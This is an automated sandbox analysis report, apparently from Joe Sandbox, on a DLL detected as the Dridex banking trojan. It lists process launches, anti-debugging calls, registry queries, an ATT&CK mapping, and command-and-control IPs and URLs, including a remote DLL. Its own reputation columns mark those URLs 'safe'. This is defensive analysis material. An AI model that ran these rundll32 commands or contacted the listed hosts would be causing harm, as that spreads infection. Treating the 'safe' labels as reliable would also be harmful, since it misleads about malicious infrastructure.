Source: Yara match	File source: 00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.420461174.0000000004120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.396279024.0000000004910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.431718268.00000000009E0000.00000040.00000001.sdmp, type: MEMORY

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9F51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

0_2_6E9F51A7

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score

Show sources

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Joe Sandbox Cloud Basic: Detection: malicious Score: 88 Threat Name: Dridex

Perma Link

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA067C8	0_2_6EA067C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA08AB0	0_2_6EA08AB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA126B0	0_2_6EA126B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA11EB0	0_2_6EA11EB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0AE80	0_2_6EA0AE80
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0F6E0	0_2_6EA0F6E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F6AD0	0_2_6E9F6AD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA08EF0	0_2_6EA08EF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0B6F0	0_2_6EA0B6F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA162F0	0_2_6EA162F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA13EC0	0_2_6EA13EC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1FA10	0_2_6EA1FA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA096D0	0_2_6EA096D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA10220	0_2_6EA10220
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1D620	0_2_6EA1D620
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9FCA10	0_2_6E9FCA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1FA10	0_2_6EA1FA10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0A660	0_2_6EA0A660
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA17660	0_2_6EA17660
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA12E60	0_2_6EA12E60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9FB254	0_2_6E9FB254
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA09E70	0_2_6EA09E70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA11240	0_2_6EA11240
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F9E70	0_2_6E9F9E70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F1784	0_2_6E9F1784
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0E3F0	0_2_6EA0E3F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA083C0	0_2_6EA083C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA07FC0	0_2_6EA07FC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA17FC0	0_2_6EA17FC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA11730	0_2_6EA11730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA13B00	0_2_6EA13B00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA19B10	0_2_6EA19B10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA05B60	0_2_6EA05B60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0BF50	0_2_6EA0BF50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0E0A0	0_2_6EA0E0A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA14CA0	0_2_6EA14CA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA150A0	0_2_6EA150A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1DCA0	0_2_6EA1DCA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA15CB0	0_2_6EA15CB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA088C0	0_2_6EA088C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA08CC0	0_2_6EA08CC0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0A0D0	0_2_6EA0A0D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA098DA	0_2_6EA098DA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA11020	0_2_6EA11020
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0D030	0_2_6EA0D030
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0D980	0_2_6EA0D980
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1D180	0_2_6EA1D180
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA0C590	0_2_6EA0C590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EA3E210	3_2_6EA3E210

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA022A0 NtDelayExecution,		0_2_6EA022A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA1BE30 NtClose,		0_2_6EA1BE30

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

ReversingLabs: Detection: 18%

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal92.bank.troj.evad.winDLL@11/1@0/4

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static file information: File size 1375232 > 1048576

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

0_2_6E9F51A7

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA03930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6EA03930

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA1CEF8 FindFirstFileExW,

0_2_6EA1CEF8

Source: loaddll32.exe, 00000000.00000002.689683727.000000000094C000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6EA363A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6EA363A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6EA68B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,

3_2_6EA68B60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EA647C0 mov ecx, dword ptr fs:[00000030h]	3_2_6EA647C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EB3BA72 mov eax, dword ptr fs:[00000030h]	3_2_6EB3BA72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EB3B64D push dword ptr fs:[00000030h]	3_2_6EB3B64D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EB3B942 mov eax, dword ptr fs:[00000030h]	3_2_6EB3B942

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA06C50 KiUserExceptionDispatcher,LdrLoadDll,

0_2_6EA06C50

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA07A60 RtlAddVectoredExceptionHandler,		0_2_6EA07A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EA363A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_6EA363A0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.77.0.96 235	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.56.219.47 180	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.46.210.220 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 143.244.140.214 40	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.690065461.00000000014A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.690497841.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.690065461.00000000014A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.690497841.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.690065461.00000000014A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.690497841.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.690065461.00000000014A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.690497841.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EA81E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EA81F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,	3_2_6EA82750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EA6B0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6EA6BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EA81DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6EA82960

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA02980 GetUserNameW,

0_2_6EA02980

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Process Injection112	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rundll321	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Razy.980776.8232.dll	6%	Virustotal		Browse
SecuriteInfo.com.Variant.Razy.980776.8232.dll	18%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://143.244.140.214:808/hy	0%	URL Reputation	safe
https://192.46.210.220/w	0%	Avira URL Cloud	safe
https://192.46.210.220/aenh.dll	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/ion	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/	0%	URL Reputation	safe
https://45192.46.210.220/	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/n	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/r	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/s	0%	Avira URL Cloud	safe
https://143.244.140.214:808/oft	0%	URL Reputation	safe
https://192.46.210.220/#	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/m	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/fW	0%	Avira URL Cloud	safe
https://192.46.210.220/	0%	URL Reputation	safe
https://192.46.210.220/7.0.96:6891/	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/soft	0%	Avira URL Cloud	safe
https://192.46.210.220/4	0%	Avira URL Cloud	safe
https://143.244.140.214:808/la	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/14	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/der	0%	Avira URL Cloud	safe
https://143.244.140.214:808/Q#	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/N	0%	Avira URL Cloud	safe
https://192.46.210.220/:	0%	Avira URL Cloud	safe
https://143.244.140.214/	0%	URL Reputation	safe
https://185.56.219.47/	0%	URL Reputation	safe
https://45.77.0.96:6891/F	0%	Avira URL Cloud	safe
https://192.46.210.220/A	0%	Avira URL Cloud	safe
https://143.244.140.214:808/q	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/I	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/dv	0%	Avira URL Cloud	safe
https://192.46.210.220/H	0%	Avira URL Cloud	safe
https://143.244.140.214:808/l	0%	URL Reputation	safe
https://192.46.210.220/S	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/tv	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/graphy	0%	URL Reputation	safe
https://143.244.140.214:808/	0%	URL Reputation	safe
https://143.244.140.214:808/l?	0%	Avira URL Cloud	safe
https://192.46.210.220/N	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/	0%	URL Reputation	safe
https://45.77.0.96:6891/derF	0%	Avira URL Cloud	safe
https://192.46.210.220/X	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/.0.96:6891/m	0%	Avira URL Cloud	safe
https://185.56.219.47:8116/0	0%	Avira URL Cloud	safe
https://192.46.210.220/k	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/der6	0%	Avira URL Cloud	safe
https://192.46.210.220/e	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/6	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/der.	0%	Avira URL Cloud	safe
https://45.77.0.96:6891/Microsoft	0%	URL Reputation	safe
https://14.77.0.96:6891/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://192.46.210.220/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://143.244.140.214:808/hy	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/w	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/aenh.dll	loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/ion	loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45192.46.210.220/	loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://45.77.0.96:6891/n	loaddll32.exe, 00000000.00000003.454214187.0000000000960000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/r	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/s	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/oft	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/#	loaddll32.exe, 00000000.00000003.544483266.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/m	loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/fW	loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/7.0.96:6891/	loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/soft	loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/4	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/la	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/14	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/der	loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/Q#	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/N	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/N	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false		unknown
https://192.46.210.220/:	loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214/	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://185.56.219.47/	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45.77.0.96:6891/F	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/A	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/q	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/I	loaddll32.exe, 00000000.00000003.462293153.0000000000998000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/dv	rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/H	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/l	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/S	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/tv	rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/graphy	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.690791416.000000000516B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214:808/	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214:808/l?	loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/N	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/	loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45.77.0.96:6891/derF	loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/X	loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
